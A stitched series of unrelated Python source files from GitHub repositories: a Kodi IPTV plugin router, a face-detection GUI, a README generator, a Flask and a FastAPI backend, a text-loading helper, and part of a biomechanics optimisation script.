url = get_url(action='list_live', label = addon.getLocalizedString(300111))
list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'livetv.png'), 'icon' : os.path.join(icons_dir , 'livetv.png') })
xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300112))
url = get_url(action='list_archive', label = addon.getLocalizedString(300112))
list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'archive.png'), 'icon' : os.path.join(icons_dir , 'archive.png') })
xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
if addon.getSetting('hide_settings') != 'true':
list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300100))
url = get_url(action='list_settings', label = addon.getLocalizedString(300100))
list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'settings.png'), 'icon' : os.path.join(icons_dir , 'settings.png') })
xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
xbmcplugin.endOfDirectory(_handle)
def router(paramstring):
params = dict(parse_qsl(paramstring))
check_settings()
if params:
if params['action'] == 'list_live':
list_live(label = params['label'])
elif params['action'] == 'play_live':
play_live(id = params['id'])
elif params['action'] == 'list_archive':
list_archive(label = params['label'])
elif params['action'] == 'list_archive_days':
list_archive_days(id = params['id'], label = params['label'])
elif params['action'] == 'list_program':
list_program(id = params['id'], day_min = params['day_min'], label = params['label'])
elif params['action'] == 'play_archive':
play_archive(id = params['id'], channel_id = params['channel_id'])
elif params['action'] == 'manage_channels':
manage_channels(label = params['label'])
elif params['action'] == 'reset_channels_list':
channels = Channels()
channels.reset_channels()
elif params['action'] == 'restore_channels':
channels = Channels()
channels.restore_channels(backup = params['backup'])
elif params['action'] == 'list_channels_list_backups':
list_channels_list_backups(label = params['label'])
elif params['action'] == 'list_channels_edit':
list_channels_edit(label = params['label'])
elif params['action'] == 'edit_channel':
edit_channel(id = params['id'])
elif params['action'] == 'delete_channel':
delete_channel(id = params['id'])
elif params['action'] == 'change_channels_numbers':
change_channels_numbers(from_number =params['from_number'], direction = params['direction'])
elif params['action'] == 'list_channels_groups':
list_channels_groups(label = params['label'])
elif params['action'] == 'add_channel_group':
add_channel_group(label = params['label'])
elif params['action'] == 'edit_channel_group':
edit_channel_group(group = params['group'], label = params['label'])
elif params['action'] == 'delete_channel_group':
delete_channel_group(group = params['group'])
elif params['action'] == 'select_channel_group':
select_channel_group(group = params['group'])
elif params['action'] == 'edit_channel_group_list_channels':
edit_channel_group_list_channels(group = params['group'], label = params['label'])
elif params['action'] == 'edit_channel_group_add_channel':
edit_channel_group_add_channel(group = params['group'], channel = params['channel'])
elif params['action'] == 'edit_channel_group_add_all_channels':
edit_channel_group_add_all_channels(group = params['group'])
elif params['action'] == 'edit_channel_group_delete_channel':
edit_channel_group_delete_channel(group = params['group'], channel = params['channel'])
elif params['action'] == 'list_devices':
list_devices(label = params['label'])
elif params['action'] == 'remove_device':
remove_device(id = params['id'], title = params['title'], last_activity = params['last_activity'])
elif params['action'] == 'list_settings':
list_settings(label = params['label'])
elif params['action'] == 'addon_settings':
xbmcaddon.Addon().openSettings()
elif params['action'] == 'reset_session':
session = Session()
session.remove_session()
elif params['action'] == 'generate_playlist':
if 'output_file' in params:
generate_playlist(params['output_file'])
xbmcplugin.addDirectoryItem(_handle, '1', xbmcgui.ListItem())
xbmcplugin.endOfDirectory(_handle, succeeded = True)
else:
generate_playlist()
elif params['action'] == 'generate_epg':
if 'output_file' in params:
generate_epg(params['output_file'])
xbmcplugin.addDirectoryItem(_handle, '1', xbmcgui.ListItem())
xbmcplugin.endOfDirectory(_handle, succeeded = True)
else:
generate_epg()
elif params['action'] == 'iptsc_play_stream':
if 'catchup_start_ts' in params and 'catchup_end_ts' in params:
play_catchup(id = params['id'], start_ts = params['catchup_start_ts'], end_ts = params['catchup_end_ts'])
else:
play_live(params['id'])
else:
raise ValueError('Neznámý parametr: {0}!'.format(paramstring))
else:
main_menu()
if __name__ == '__main__':
router(sys.argv[2][1:])
| waladir/plugin.video.rebittv | main.py | main.py | py | 7,178 | python | en | code | 0 | github-code | 36 |
18041766413 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 9 11:35:21 2023
@author: akava
"""
import tkinter as tk
from tkinter import ttk
from PIL import Image, ImageTk
import customtkinter, tkinter
from retinaface import RetinaFace
import cv2
from gender_classification.gender_classifier_window import GenderClassifierWindow
class SinglePhotoDetectionPage:
def __init__(self, Load, App, App_window, image1, options):
self.App = App
self.App_window = App_window
self.Load = Load
self.root = customtkinter.CTkToplevel()
self.root.title("Pagina de Deteccion de Rostros de una Sola Foto")
self.root.geometry("800x600") # Tamaño de la ventana
self.root.resizable(False, False)
self.checkbox_vars = []
# Configurar el evento de cierre de la ventana secundaria
self.root.protocol("WM_DELETE_WINDOW", self.on_closing)
# Variable de control para rastrear si se ha borrado alguna imagen
self.images_deleted = False
self.detected_faces = RetinaFace.extract_faces(image1, align = True)
num_personas= len(self.detected_faces)
self.scaled_image=image1
self.Load.withdraw()
main_frame = customtkinter.CTkFrame(self.root, fg_color=("transparent"))
main_frame.pack(fill=tk.BOTH, expand=True)
# Crear un Frame para el mensaje
message_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
message_frame.pack(side=tk.TOP, fill=tk.X)
# Agregar una etiqueta para el mensaje "Selecciona las fotos que deseas eliminar"
message_label = customtkinter.CTkLabel(message_frame, text="Selecciona las fotos que deseas eliminar:", font=('Calibri', 15), fg_color="transparent", width=110)
message_label.pack(padx=10, pady=5, anchor=tk.W)
# Crear un Frame para las imágenes
images_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
images_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
# Crear un Frame para los botones
button_frame = customtkinter.CTkFrame(main_frame, fg_color="transparent")
button_frame.pack(side=tk.RIGHT, fill=tk.Y)
face_count_image = customtkinter.CTkImage(Image.open("images/face.png"), size=(26, 26))
self.face_count_label1 = customtkinter.CTkButton(button_frame, image=face_count_image, text_color="black", fg_color="transparent", text="", width=30)
self.face_count_label1.pack(padx=10, pady=10, anchor=tk.W)
# Botones para continuar y regresar en el Frame de los botones
home_image = customtkinter.CTkImage(Image.open("images/home.png"), size=(26, 26))
home_button = customtkinter.CTkButton(
button_frame,
image=home_image,
fg_color="transparent",
text_color= "black",
text="Home", width=10,
command=self.return_to_main_menu)
home_button.pack(pady=10)
home_button.pack(padx=10, pady=10, anchor=tk.W)
continue_image = customtkinter.CTkImage(Image.open("images/aceptar.png"), size=(26, 26))
continue_button = customtkinter.CTkButton(
button_frame,
text="Aceptar",
width=20,
command=self.continue_pressed,
image=continue_image,
text_color="black",
fg_color="transparent"
)
continue_button.pack(padx=10, pady=10, anchor=tk.W)
delete_image = customtkinter.CTkImage(Image.open("images/borrar.png"), size=(26, 26))
delete_button = customtkinter.CTkButton(
button_frame,
text="Borrar",
width=20,
command=self.delete_selected,
image=delete_image,
text_color="black",
fg_color="transparent"
)
delete_button.pack(padx=10, pady=10, anchor=tk.W)
back_image = customtkinter.CTkImage(Image.open("images/volver.png"), size=(26, 26))
back_button = customtkinter.CTkButton(
button_frame,
text="Regresar",
width=20,
command=self.go_back,
image=back_image,
text_color="black",
fg_color="transparent"
)
back_button.pack(padx=10, pady=10, anchor=tk.W)
# Agregar una Scrollbar al Frame de las imágenes
scroll_y = tk.Scrollbar(images_frame, orient=tk.VERTICAL)
scroll_y.pack(side=tk.RIGHT, fill=tk.Y)
# Crear un Canvas para mostrar las imágenes con scrollbar en el Frame de las imágenes
canvas = tk.Canvas(images_frame, yscrollcommand=scroll_y.set)
canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
scroll_y.config(command=canvas.yview)
# Crear un Frame en el Canvas para mostrar las imágenes
self.frame = customtkinter.CTkFrame(canvas, fg_color=("transparent"), width=650)
canvas.create_window((0, 0), window=self.frame, anchor=tk.NW)
self.display_detected_faces(self.frame , self.detected_faces, self.scaled_image )
# Configurar el Canvas para que pueda desplazarse
canvas.update_idletasks()
canvas.config(scrollregion=canvas.bbox("all"))
# Función para eliminar imágenes seleccionadas
def delete_selected(self):
self.detected_faces = self.delete_selected_images(self.scaled_image, self.detected_faces, self.checkbox_vars)
# Actualizar la variable de control
self.images_deleted = True
self.display_detected_faces(self.frame, self.detected_faces, self.scaled_image)
def display_detected_faces(self, frame, detected_faces, scaled_image):
for widget in frame.winfo_children():
widget.destroy()
self.face_count_label1.configure(text="Rostros: {}".format(self.count_faces(self.detected_faces)))
# Lista para mantener el estado de los checkboxes
self.checkbox_vars = []
# Contadores para controlar las columnas y filas de las imágenes
col_count = 0
row_count = 0
self.person_images_tk = []
style = ttk.Style()
style.configure('TCheckbutton', font=('Calibri', 9))
# Lista para mantener las imágenes personales
for i, detection in enumerate(detected_faces):
person_image = detection
# Convertir la imagen de NumPy a imagen de PIL
person_image_pil = Image.fromarray(cv2.cvtColor(person_image, cv2.COLOR_BGR2RGB))
# Redimensionar la imagen
person_image_pil = person_image_pil.resize((150, 150), Image.LANCZOS)
# Redimensionar la imagen para mostrarla en tamaño más pequeño en la interfaz
person_image_pil_small = person_image_pil.resize((80, 80), Image.LANCZOS)
# Convertir la imagen de PIL a PhotoImage
person_image_tk = ImageTk.PhotoImage(person_image_pil) # Usar la imagen original aquí
self.person_images_tk.append(person_image_tk) # Agregar a la lista
# Crear una variable para el estado del checkbox
checkbox_var = tk.BooleanVar(value=False)
self.checkbox_vars.append(checkbox_var)
# Convertir la imagen de PIL a PhotoImage
person_image_small_tk = ImageTk.PhotoImage(person_image_pil_small)
# Mostrar la imagen en una etiqueta dentro del Frame
label = customtkinter.CTkLabel(frame, image=person_image_small_tk, text="")
# Agregar un checkbox para seleccionar la imagen
checkbox = ttk.Checkbutton(frame, text="Seleccionar", variable=checkbox_var)
# Colocar la etiqueta y el checkbox en la posición adecuada usando grid
label.grid(row=row_count, column=col_count, padx=9, pady=5)
checkbox.grid(row=row_count + 1, column=col_count, padx=9, pady=0)
# Actualizar los contadores de columna y fila
col_count += 1
# Si col_count es 0, significa que estamos en una nueva fila y necesitamos actualizar los contadores
if col_count == 0:
row_count += 2
elif col_count >= 6:
col_count = 0
row_count += 2
return self.person_images_tk
def on_click(self, index):
print(index)
def continue_pressed(self):
# Crear una nueva instancia de la ventana del Clasificador de género
if self.images_deleted:
self.root.withdraw()
faces=self.extract_faces(self.scaled_image, self.updated_detected_faces)
app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
else:
self.root.withdraw()
faces=self.extract_faces(self.scaled_image, self.detected_faces)
app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
def count_faces(self, detected_faces):
return len(detected_faces)
def go_back(self):
# Hacer que la ventana anterior vuelva a ser visible
self.Load.deiconify()
# Cerrar la ventana actual
self.root.destroy()
def extract_faces(self, scaled_image, detected_faces):
faces = [] # Lista para almacenar los rostros extraídos
# Iterar sobre las detecciones de rostros
for detection in detected_faces:
#x1, y1, width1, height1 = detection['box']
#x1, y1, width1, height1 = int(x1), int(y1), int(width1), int(height1)
#face_roi = scaled_image[y1:y1+height1, x1:x1+width1]
#faces.append(face_roi)
faces.append(detection)
return faces
def delete_selected_images(self, scaled_image, detected_faces, checkbox_vars):
# Eliminar las imágenes seleccionadas de detected_faces
updated_detected_faces = []
for detection, checkbox_var in zip(detected_faces, checkbox_vars):
if not checkbox_var.get():
updated_detected_faces.append(detection)
self.updated_detected_faces = updated_detected_faces
return updated_detected_faces
def on_closing(self):
# Restaura la ventana principal
self.App_window.deiconify()
# Cierra la ventana de PhotoLoadPage
self.root.destroy()
self.Load.destroy()
def return_to_main_menu(self):
# Restaura la ventana principal
self.App_window.deiconify()
# Cierra la ventana de PhotoLoadPage
self.root.destroy()
self.Load.destroy() | MartinVaro/Modular | detection/single_photo_detection_page.py | single_photo_detection_page.py | py | 10,890 | python | es | code | 0 | github-code | 36 |
38075605873 | # -*- coding: utf-8 -*-
from pathlib import Path
class Manager:
def create_readme():
root_path = Path(__file__).parent
info ="""## حل سوالات کوئرا
برای دیدن صفحه ی اصلی هر سوال در سایت کوئرا میتوانید روی نام هر سوال کلیک کنید و یا در قسمت توضیحات روی PDF کلیک کنید.
showmeyourcode.ir
"""
table_header = [
"شماره سؤال",
"نام سؤال",
"youtube",
"لینک جواب",
"توضیحات",
]
with open('README.md',"w",encoding="utf8") as main_readme:
main_readme.write(info+'\n')
main_readme.write("|"+"|".join(table_header)+"|"+'\n')
main_readme.write("|-"*len(table_header)+"|"+'\n')
index=1
for question_path in root_path.glob(r"*/"):
if not question_path.is_file() and not str(question_path.relative_to(root_path)).startswith("."):
main_readme.write(f"|{index}")
# main_readme.write("|"+str(question_path.relative_to(root_path)))
with open(str(question_path.joinpath("readme.md")),"r",encoding="utf8") as local_readme:
main_readme.write("|"+local_readme.readline().strip())
main_readme.write("|"+local_readme.readline().strip())
main_readme.write("|")
for language in question_path.glob("*"):
if language.is_dir():
readme_path = str(language.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[{str(language.relative_to(question_path))}]({readme_path}), ")
main_readme.write("|")
for local_readmes in question_path.glob("*.md"):
if local_readmes.is_file():
readme_path = str(local_readmes.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[readme]({readme_path}), ")
for pdfs in question_path.glob("*.pdf"):
if pdfs.is_file():
pdf = str(pdfs.relative_to(root_path)).replace(' ','%20').replace('\\','/')
main_readme.write(f"[pdf]({pdf}), ")
main_readme.write("|\n")
index+=1
if __name__ == "__main__":
Manager.create_readme()
| MohammadNPak/quera.ir | manage.py | manage.py | py | 2,594 | python | en | code | 40 | github-code | 36 |
8524473683 | # coding=gbk
import numpy as np
import pandas as pd
import re
from jieba import lcut
def clean_str(text):
text = text.lower()
# Clean the text
text = re.sub(r"[^A-Za-z0-9^,!.\/'+-=]", " ", text)
text = re.sub(r"what's", "what is ", text)
text = re.sub(r"that's", "that is ", text)
text = re.sub(r"there's", "there is ", text)
text = re.sub(r"it's", "it is ", text)
text = re.sub(r"\'s", " ", text)
text = re.sub(r"\'ve", " have ", text)
text = re.sub(r"can't", "can not ", text)
text = re.sub(r"n't", " not ", text)
text = re.sub(r"i'm", "i am ", text)
text = re.sub(r"\'re", " are ", text) #\'re 转义'
text = re.sub(r"\'d", " would ", text)
text = re.sub(r"\'ll", " will ", text)
text = re.sub(r",", " ", text)
text = re.sub(r"\.", " ", text)
text = re.sub(r"!", " ! ", text)
text = re.sub(r"\/", " ", text)
text = re.sub(r"\^", " ^ ", text)
text = re.sub(r"\+", " + ", text)
text = re.sub(r"\-", " - ", text)
text = re.sub(r"\=", " = ", text)
text = re.sub(r"'", " ", text)
text = re.sub(r"(\d+)(k)", r"\g<1>000", text)
text = re.sub(r":", " : ", text)
text = re.sub(r" e g ", " eg ", text)
text = re.sub(r" b g ", " bg ", text)
text = re.sub(r" u s ", " american ", text)
text = re.sub(r"\0s", "0", text)
text = re.sub(r" 9 11 ", "911", text)
text = re.sub(r"e - mail", "email", text)
text = re.sub(r"j k", "jk", text)
text = re.sub(r"\s{2,}", " ", text)
return text.strip()
#data_training的文本的下标是4,tfidf值的下标是7
#my_data的文本下标是4,点击量的下标是3
def load_data_and_labels(path):#读取文本的函数,可能要换成连接mysql的函数;注意是train.py读取文本的函数
data_x, data_x_list, data_y = [], [], []#data_x为处理前的文本,格式为一个列表中包含着装着新闻内容的列表(用于输出),data_x_list是将文本变成一个大的列表形式(用于在接下来的分词处理)
f = pd.ExcelFile(path)
io = pd.io.excel.ExcelFile(path)
for i in f.sheet_names: # 读取里面每一个sheet
dx = pd.read_excel(io, sheet_name=i, usecols=[4]) #这里是读取第五列,如果要修改读取的列数就修改这里的数字
dy = pd.read_excel(io, sheet_name=i, usecols=[7])
datax = dx.values.tolist()
datay = dy.values.tolist()
for j in datax:
l = str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')
k = [str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')] # 这里还需要将标点符号换掉
data_x.append(k)
data_x_list.append(l)
for m in datay:
data_y.append(m[0])
data = []
max_sentence_length = 0
max_paragraph_length = 0
for id in range(len(data_x_list)):
paragraphs = data_x_list[id]
sentences_split = re.split('(。|!|\!|\.|?|\?)',paragraphs)
sentences = []
for i in range(int(len(sentences_split) / 2)):
sent = sentences_split[2 * i] + sentences_split[2 * i + 1]
sentences.append(sent)
if max_paragraph_length < len(sentences):
max_paragraph_length = len(sentences)
for n, sentence in enumerate(sentences):
tokens = lcut(sentence)
if max_sentence_length < len(tokens):
max_sentence_length = len(tokens)
sentence = " ".join(tokens)
sentences[n] = sentence
data.append([id, sentences])
print(path)
# print("max sentence length = {}\n".format(max_sentence_length))
# print("max_paragraph_length = {}\n".format(max_paragraph_length))
df = pd.DataFrame(data=data, columns=["id", "sentences"]) #创建一个二维数据表,列名为id等
x_text = df['sentences'].tolist() #转为列表
return x_text, data_y
def batch_iter(data, batch_size, num_epochs, shuffle=False): #生成一个迭代器,输入x_batch时 共7200/10 * 100 = 72000次
"""
Generates a batch iterator for a dataset.
"""
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1 #获得每个epoch的batch数目,结果为720
#for epoch in range(num_epochs): #100次
# Shuffle the data at each epoch
if shuffle:
shuffle_indices = np.random.permutation(np.arange(data_size)) #随机排列一个序列,或者数组。
shuffled_data = data[shuffle_indices]
else:
shuffled_data = data
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index] #一次产出batch_size数量的句子-关系对
if __name__ == "__main__":
trainFile = 'data.xlsx'
testFile = 'SemEval2010_task8_all_data/SemEval2010_task8_testing_keys/TEST_FILE_FULL.TXT'
a, b = load_data_and_labels(trainFile)
print(len(a))
print(len(b))
def eval_load_data_and_labels(path):#读取文本的函数,可能要换成连接mysql的函数;注意是eval.py读取文本的函数
data_x, data_x_list, data_y = [], [], []
f = pd.ExcelFile(path)
io = pd.io.excel.ExcelFile(path)
for i in f.sheet_names: # 读取里面每一个sheet
dx = pd.read_excel(io, sheet_name=i, usecols=[5]) # 这里是读取第五列,如果要修改读取的列数就修改这里的数字
dy = pd.read_excel(io, sheet_name=i, usecols=[8])
datax = dx.values.tolist()
datay = dy.values.tolist()
for j in datax:
l = str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')
k = [str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')] # 这里还需要将标点符号换掉
data_x.append(k)
data_x_list.append(l)
for m in datay:
data_y.append(m[0])
data = []
# lines = [line.strip() for line in open(path)]
max_sentence_length = 0
max_paragraph_length = 0
for id in range(len(data_x_list)): # 主要目标是分词,y值已经处理好
paragraphs = data_x_list[id] # 读取文章
sentences_split = re.split('(。|!|\!|\.|?|\?)', paragraphs)
sentences = []
for i in range(int(len(sentences_split) / 2)):
sent = sentences_split[2 * i] + sentences_split[2 * i + 1]
sentences.append(sent)
# sentences = nltk.sent_tokenize(paragraphs)#用正则分割句子
if max_paragraph_length < len(sentences):
max_paragraph_length = len(sentences)
for n, sentence in enumerate(sentences):
# sentence = clean_str(sentence)
tokens = lcut(sentence)
# tokens = nltk.word_tokenize(sentence) #用jieba分词
if max_sentence_length < len(tokens):
max_sentence_length = len(tokens)
# if len(tokens) > FLAGS.max_sentence_length:
# print(tokens)
sentence = " ".join(tokens) # 有啥区别???
sentences[n] = sentence
data.append([id, sentences])
print(path)
print("max sentence length = {}\n".format(max_sentence_length))
print("max_paragraph_length = {}\n".format(max_paragraph_length))
df = pd.DataFrame(data=data, columns=["id", "sentences"]) # 创建一个二维数据表,列名为id等
x_text = df['sentences'].tolist() # 转为列表
return x_text, data_x, data_y # x_text为处理后的文本(用在模型中),data_x为处理前的文本(用于输出)
| mrgulugulu/text_regression | data_helpers.py | data_helpers.py | py | 7,290 | python | en | code | 0 | github-code | 36 |
24744353166 | import pandas as pd
import os
path = "C:\\Users\\brunn\\Desktop\\SENAC\\topicos-avancados"
files = os.listdir(path)
extension = 'csv'
files_open = [path + '\\' + f for f in files if f[-len(extension):] == extension]
list_of_dataframes = []
for file in files_open:
list_of_dataframes.append(pd.read_csv(file, delimiter=';'))
merged_data = pd.concat(list_of_dataframes)
merged_data | brunnolorenzoni/scripts-topicos-avancados | loadfile.py | loadfile.py | py | 389 | python | en | code | 0 | github-code | 36 |
33738820247 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
db = SQLAlchemy()
def create_app():
app = Flask(__name__)
cors = CORS(app)
app.config["FLASK_DEBUG"] = True
app.config['SECRET_KEY'] = 'secret-key-goes-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'
from .models import Result, Patient, DeliveryReports
db.init_app(app)
with app.app_context():
db.create_all()
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app
| KariukiAntony/MMUST-HealthIT-TAT-App | app/__init__.py | __init__.py | py | 571 | python | en | code | 1 | github-code | 36 |
30352454411 | from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from starlette import status
from starlette.responses import RedirectResponse
from database import get_db
from domain.answer import answer_schema, answer_crud
from domain.question import question_crud, question_schema
from domain.user.user_router import get_current_user
from models import User
router = APIRouter(
prefix="/api/answer",
)
@router.post("/create/{question_id}", response_model=question_schema.Question)
def answer_create(question_id: int,
_answer_create: answer_schema.AnswerCreate,
db: Session = Depends(get_db),
current_user: User = Depends(get_current_user)):
# create answer
question = question_crud.get_question(db, question_id=question_id)
if not question:
raise HTTPException(status_code=404, detail="Question not found")
answer_crud.create_answer(db, question=question,
answer_create=_answer_create,
user=current_user)
# redirect
from domain.question.question_router import router as question_router
url = question_router.url_path_for('question_detail',
question_id=question_id)
return RedirectResponse(url, status_code=303)
@router.put("/update", status_code=status.HTTP_204_NO_CONTENT)
def amswer_update(_answer_update: answer_schema.AnswerUpdate, db: Session = Depends(get_db), current_user: User = Depends(get_current_user)):
db_answer = answer_crud.get_answer(db, answer_id=_answer_update.answer_id)
if not db_answer:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없습니다.")
if current_user.id != db_answer.user.id:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="수정 권한이 없습니다.")
answer_crud.update_answer(db=db, db_answer=db_answer, answer_updaete=_answer_update)
@router.get("/detail/{answer_id}", response_model=answer_schema.Answer)
def answer_detail(answer_id: int, db: Session = Depends(get_db)):
answer = answer_crud.get_answer(db, answer_id=answer_id)
return answer
@router.post("/vote", status_code=status.HTTP_204_NO_CONTENT)
def answer_vote(_answer_vote: answer_schema.AnswerVote, db: Session = Depends(get_db), current_user: User =Depends(get_current_user)):
db_answer = answer_crud.get_answer(db, answer_id=_answer_vote.answer_id)
if not db_answer:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없다.")
answer_crud.vote_answer(db, db_answer=db_answer, db_user=current_user) | dlawnsdk/study-fastapi-project | domain/answer/answer_router.py | answer_router.py | py | 2,709 | python | en | code | 1 | github-code | 36 |
21017557226 | """
The goal of this program is to optimize the movement to achieve a rudi out pike (803<) for left twisters.
"""
import os
import numpy as np
import biorbd_casadi as biorbd
from casadi import MX, Function
from bioptim import (
OptimalControlProgram,
DynamicsList,
DynamicsFcn,
ObjectiveList,
ObjectiveFcn,
BoundsList,
InitialGuessList,
InterpolationType,
OdeSolver,
Node,
Solver,
BiMappingList,
CostType,
ConstraintList,
ConstraintFcn,
PenaltyController,
MultiStart,
Solution,
MagnitudeType,
BiorbdModel,
)
import time
import pickle
class Model:
"""
Attributes
----------
model: str
A reference to the name of the model
with_hsl :
no hsl, don't use libhsl
n_threads : int
refers to the numbers of threads in the solver
savesol :
returns true if empty, else returns False
show_online : bool
returns true if empty, else returns False
print_ocp : bool
returns False if empty, else returns True """
def __init__(self, model, n_threads=5, with_hsl=False, savesol=False, show_online=False, print_ocp=False):
self.model = model
self.with_hsl = with_hsl
self.n_threads = n_threads
self.savesol = savesol
self.show_online = show_online
self.print_ocp = print_ocp
#
# # if savesol :
# # return False
#
# if show_online:
# return False
#
# if print_ocp:
# return True
# parser = argparse.ArgumentParser()
# parser.add_argument("model", type=str, help="the bioMod file")
# parser.add_argument("--no-hsl", dest='with_hsl', action='store_false', help="do not use libhsl")
# parser.add_argument("-j", default=1, dest='n_threads', type=int, help="number of threads in the solver")
# parser.add_argument("--no-sol", action='store_false', dest='savesol', help="do not save the solution")
# parser.add_argument("--no-show-online", action='store_false', dest='show_online', help="do not show graphs during optimization")
# parser.add_argument("--print-ocp", action='store_true', dest='print_ocp', help="print the ocp")
# args = parser.parse_args()
#
try:
import IPython
IPYTHON = True
except ImportError:
print("No IPython.")
IPYTHON = False
def minimize_dofs(controller: PenaltyController, dofs: list, targets: list):
diff = 0
for i, dof in enumerate(dofs):
diff += (controller.states['q'].cx_start[dof] - targets[i]) ** 2
return diff
def prepare_ocp(
biorbd_model_path: str, nb_twist: int, seed : int,
ode_solver: OdeSolver = OdeSolver.RK4(),
) -> OptimalControlProgram:
"""
Prepare the ocp
Parameters
----------
biorbd_model_path: str
The path to the bioMod file
ode_solver: OdeSolver
The ode solver to use
Returns
-------
The OptimalControlProgram ready to be solved
"""
final_time = 1.87
n_shooting = (40, 100, 100, 100, 40)
biomodel = (BiorbdModel(biorbd_model_path))
biorbd_model = (biomodel,biomodel, biomodel, biomodel,biomodel)
nb_q = biorbd_model[0].nb_q
nb_qdot = biorbd_model[0].nb_qdot
nb_qddot_joints = nb_q - biorbd_model[0].nb_root
# Pour la lisibilite
X = 0
Y = 1
Z = 2
Xrot = 3
Yrot = 4
Zrot = 5
ZrotBD = 6
YrotBD = 7
ZrotABD = 8
XrotABD = 9
ZrotBG = 10
YrotBG = 11
ZrotABG = 12
XrotABG = 13
XrotC = 14
YrotC = 15
vX = 0
vY = 1
vZ = 2
vXrot = 3
vYrot = 4
vZrot = 5
vZrotBD = 6
vYrotBD = 7
vZrotABD = 8
vYrotABD = 9
vZrotBG = 10
vYrotBG = 11
vZrotABG = 12
vYrotABG = 13
vXrotC = 14
vYrotC = 15
# Add objective functions
objective_functions = ObjectiveList()
# objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_MARKERS, marker_index=1, weight=-1)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=0)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=1)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=2)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=3)
objective_functions.add(ObjectiveFcn.Lagrange.MINIMIZE_CONTROL, key="qddot_joints", node=Node.ALL_SHOOTING,
weight=1, phase=4)
objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_TIME, min_bound=.0, max_bound=1.0, weight=100000,
phase=0)
objective_functions.add(ObjectiveFcn.Mayer.MINIMIZE_TIME, min_bound=.0, max_bound=1.0, weight=100000,
phase=2)
objective_functions.add(ObjectiveFcn.Mayer.SUPERIMPOSE_MARKERS, node=Node.END, first_marker='MidMainG',
second_marker='CibleMainG', weight=1000, phase=0)
objective_functions.add(ObjectiveFcn.Mayer.SUPERIMPOSE_MARKERS, node=Node.END, first_marker='MidMainD',
second_marker='CibleMainD', weight=1000, phase=0)
# arrete de gigoter les bras
les_bras = [ZrotBD, YrotBD, ZrotABD, XrotABD, ZrotBG, YrotBG, ZrotABG, XrotABG]
les_coudes = [ZrotABD, XrotABD, ZrotABG, XrotABG]
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_coudes, targets=np.zeros(len(les_coudes)), weight=1000, phase=0)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=0)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=1)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=2)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=3)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_bras, targets=np.zeros(len(les_bras)), weight=10, phase=4)
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Lagrange, node=Node.ALL_SHOOTING,
dofs=les_coudes, targets=np.zeros(len(les_coudes)), weight=1000, phase=4)
# ouvre les hanches rapidement apres la vrille
objective_functions.add(minimize_dofs, custom_type=ObjectiveFcn.Mayer, node=Node.END, dofs=[XrotC],
targets=[0], weight=10000, phase=3)
# Dynamics
dynamics = DynamicsList()
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
dynamics.add(DynamicsFcn.JOINTS_ACCELERATION_DRIVEN)
